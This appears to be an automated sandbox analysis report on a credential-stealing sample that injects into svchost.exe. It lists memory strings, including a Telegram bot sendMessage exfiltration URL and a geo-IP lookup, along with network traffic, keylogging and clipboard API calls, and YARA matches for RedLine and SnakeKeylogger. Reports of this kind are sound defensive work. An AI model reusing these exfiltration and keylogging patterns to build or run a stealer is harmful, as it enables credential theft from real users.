Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20a
Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000001.00000002.3766303344.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: svchost.exe, 00000001.00000002.3766303344.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: svchost.exe, 00000001.00000002.3766303344.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: svchost.exe, 00000001.00000002.3766303344.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: svchost.exe, 00000001.00000002.3766303344.0000000005C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005BCF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: svchost.exe, 00000001.00000002.3766303344.0000000005D18000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005D09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: svchost.exe, 00000001.00000002.3766303344.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0085425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0085425A

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_00854458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00854458

Source: C:\Users\user\Desktop\8JVG9KELay.exe

0_2_0085425A

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_00840219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00840219

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0086CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0086CDAC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.8JVG9KELay.exe.d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1326810338.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.3764565909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: This is a third-party compiled AutoIt script.	0_2_007E3B4C
Source: 8JVG9KELay.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 8JVG9KELay.exe, 00000000.00000002.1326575103.0000000000895000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7b1a8267-b
Source: 8JVG9KELay.exe, 00000000.00000002.1326575103.0000000000895000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1f348bb8-3
Source: 8JVG9KELay.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8428c54e-c
Source: 8JVG9KELay.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_90f734bb-e

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_008440B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_008440B1

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_00838858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00838858

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0084545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0084545F

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007EE800	0_2_007EE800
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0080DBB5	0_2_0080DBB5
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007EFE40	0_2_007EFE40
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007EE060	0_2_007EE060
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0086804A	0_2_0086804A
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007F4140	0_2_007F4140
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00802405	0_2_00802405
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00816522	0_2_00816522
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00860665	0_2_00860665
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0081267E	0_2_0081267E
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007F6843	0_2_007F6843
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0080283A	0_2_0080283A
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_008189DF	0_2_008189DF
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00816A94	0_2_00816A94
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00860AE2	0_2_00860AE2
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007F8A0E	0_2_007F8A0E
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0083EB07	0_2_0083EB07
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00848B13	0_2_00848B13
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0080CD61	0_2_0080CD61
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00817006	0_2_00817006
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007F710E	0_2_007F710E
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007F3190	0_2_007F3190
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007E1287	0_2_007E1287
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_008033C7	0_2_008033C7
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0080F419	0_2_0080F419
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_008016C4	0_2_008016C4
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007F5680	0_2_007F5680
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_008078D3	0_2_008078D3
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007F58C0	0_2_007F58C0
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00801BB8	0_2_00801BB8
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00819D05	0_2_00819D05
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00801FD0	0_2_00801FD0
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0080BFE6	0_2_0080BFE6
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007D35E0	0_2_007D35E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00408C60	1_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040DC11	1_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00407C3F	1_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418CCC	1_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00406CA0	1_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004028B0	1_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041A4BE	1_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418244	1_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401650	1_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402F20	1_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004193C4	1_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418788	1_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402F89	1_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402B90	1_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004073A0	1_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FD4EA	1_2_053FD4EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FD7B8	1_2_053FD7B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053F7633	1_2_053F7633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FC6BB	1_2_053FC6BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FD21B	1_2_053FD21B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FCC6B	1_2_053FCC6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FCF30	1_2_053FCF30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053F2EF8	1_2_053F2EF8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053F6EE8	1_2_053F6EE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FEEE0	1_2_053FEEE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FC993	1_2_053FC993
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053F586F	1_2_053F586F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053F4311	1_2_053F4311
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053F5880	1_2_053F5880
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FFBA8	1_2_053FFBA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AE800	1_2_087AE800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A5168	1_2_087A5168
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A9D68	1_2_087A9D68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087ACDF0	1_2_087ACDF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A9698	1_2_087A9698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A9478	1_2_087A9478
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A1860	1_2_087A1860
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AEC58	1_2_087AEC58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A1850	1_2_087A1850
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AEC49	1_2_087AEC49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A0040	1_2_087A0040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A0012	1_2_087A0012
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AF4F7	1_2_087AF4F7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A8CE0	1_2_087A8CE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A8CDF	1_2_087A8CDF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AF0B0	1_2_087AF0B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AF0A0	1_2_087AF0A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A5163	1_2_087A5163
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AF960	1_2_087AF960
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AF954	1_2_087AF954
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AF508	1_2_087AF508
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087ACDE0	1_2_087ACDE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AD248	1_2_087AD248
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AD239	1_2_087AD239
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087ADAF8	1_2_087ADAF8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087ADAE8	1_2_087ADAE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A26A0	1_2_087A26A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AD6A0	1_2_087AD6A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AD690	1_2_087AD690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087ADF50	1_2_087ADF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087ADF3F	1_2_087ADF3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A0B30	1_2_087A0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A0B20	1_2_087A0B20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AE7F0	1_2_087AE7F0
